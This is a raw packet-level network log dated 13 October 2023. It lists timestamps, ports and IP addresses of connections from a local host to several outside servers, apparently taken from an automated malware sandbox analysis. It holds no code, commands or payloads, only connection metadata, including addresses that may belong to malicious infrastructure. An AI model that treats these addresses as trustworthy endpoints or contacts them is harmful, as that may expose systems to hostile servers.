Oct 13, 2023 15:21:16.985842943 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.985861063 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.985898972 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.985908031 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.985924959 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.985949993 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.093647003 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.093664885 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.093748093 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:17.094105959 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.094367981 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:17.094398022 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.094533920 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:17.094641924 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.094758034 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.094857931 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:17.095045090 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.095112085 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:17.095182896 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.095196962 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.095309973 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.095411062 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:17.095433950 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.095530987 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:17.103221893 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.103259087 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.103296041 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.103329897 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.103352070 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.103365898 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.140086889 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.140261889 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:17.140769958 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.140957117 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.141024113 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.141053915 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.141259909 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.141366005 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.141412020 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.141644955 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.141685963 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.141758919 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.142025948 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.142043114 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.142096996 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.142303944 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.142321110 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.142345905 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.142474890 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.142678976 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.143393040 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.143784046 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.143800974 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.143834114 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.144130945 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.144148111 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.144176960 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.144460917 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.144504070 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.144712925 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.144876957 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.144892931 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.144920111 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.145195961 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.145242929 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.145522118 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.145675898 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.145711899 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.145721912 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.146087885 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.146210909 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.146258116 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.146373034 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.146420002 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.146519899 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.146631956 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.146677971 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.146737099 CEST	49743	443	192.168.2.5	149.154.167.99
Oct 13, 2023 15:21:17.146812916 CEST	443	49743	149.154.167.99	192.168.2.5
Oct 13, 2023 15:21:17.146958113 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.146974087 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.146991968 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.147031069 CEST	49743	443	192.168.2.5	149.154.167.99
Oct 13, 2023 15:21:17.147051096 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.147120953 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.147167921 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.147217035 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.147232056 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.147274971 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.147286892 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.147342920 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.147526026 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.147542000 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.147567987 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.147582054 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.147609949 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.147702932 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.147746086 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.147803068 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.147850037 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.147905111 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.147948980 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.148013115 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.148030043 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.148072004 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.148173094 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.148189068 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.148214102 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.148231983 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.148288012 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.148332119 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.148343086 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.148385048 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.148400068 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.148498058 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.148514032 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.148555994 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.148564100 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.148610115 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.148642063 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.148658991 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.148715019 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.148756981 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.148768902 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.148808956 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.148825884 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.148957014 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.149013996 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.149064064 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.149122953 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.149301052 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.149317980 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.149354935 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.149404049 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.149518013 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.149575949 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.149655104 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.149671078 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.149703979 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.149734020 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.149755001 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.149832964 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.149900913 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.149912119 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.149986029 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.150099993 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.150146961 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.150178909 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.150226116 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.150259972 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.150410891 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.150428057 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.150466919 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.150547981 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.150589943 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.150665998 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.150682926 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.150715113 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.150758028 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.150804996 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.150821924 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.150847912 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.150943041 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.150973082 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.151020050 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.151051998 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.151068926 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.151099920 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.151166916 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.151207924 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.151268005 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.151325941 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.151473045 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.151498079 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.151529074 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.151550055 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.151563883 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.151626110 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.151675940 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.151695967 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.151714087 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.151783943 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.151829004 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.151830912 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.151870966 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.151871920 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.151921988 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.151963949 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.152015924 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.152056932 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.152072906 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.152101994 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.152175903 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.152255058 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.152318001 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.152363062 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.152414083 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.152475119 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.152529955 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.152573109 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.152582884 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.152614117 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.152645111 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.152663946 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.152688980 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.152730942 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.152868986 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.152885914 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.152929068 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.152954102 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.152987003 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.153032064 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.153127909 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.153143883 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.153234005 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.153307915 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.153323889 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.153371096 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.153440952 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.153456926 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.153500080 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.153561115 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.153599977 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.153646946 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.153667927 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.153724909 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.153764009 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.153795958 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.153812885 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.153965950 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.153983116 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.154009104 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.154038906 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.154098034 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.154200077 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.154275894 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.154292107 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.154325962 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.154325962 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.154361963 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.154474974 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.154490948 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.154532909 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.154565096 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.154608011 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.154716015 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.154731989 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.154773951 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.154848099 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.154932976 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.155014038 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.155030012 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.155056000 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.155086040 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.155106068 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.155122042 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.155164003 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.155222893 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.155252934 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.155314922 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.155355930 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.155417919 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.155435085 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.155462027 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.155508041 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.155589104 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.155632019 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.155651093 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:17.155693054 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:17.173077106 CEST	49743	443	192.168.2.5	149.154.167.99
Oct 13, 2023 15:21:17.173125982 CEST	443	49743	149.154.167.99	192.168.2.5
Oct 13, 2023 15:21:17.250595093 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.250622988 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.250677109 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.250710011 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.250726938 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.250752926 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.252773046 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.252793074 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.252837896 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.252846956 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.252861977 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.252887011 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.258464098 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.258481979 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.258533001 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.258564949 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.258580923 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.258708000 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.260612011 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.260632038 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.260710955 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.260720968 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.260867119 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.262209892 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.262228966 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.262271881 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.262279034 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.262293100 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.262326002 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.264178038 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.264198065 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.264246941 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.264246941 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.264271975 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.264317989 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.265714884 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.265731096 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.265769958 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.265778065 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.265791893 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.267365932 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.267389059 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.267442942 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.267451048 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.267468929 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.267489910 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.269423008 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.269440889 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.269478083 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.269488096 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.269510031 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.269541979 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.271070957 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.271092892 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.271128893 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.271136999 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.271159887 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.271178007 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.272578001 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.272595882 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.272634029 CEST	49736	443	192.168.2.5	45.130.41.106
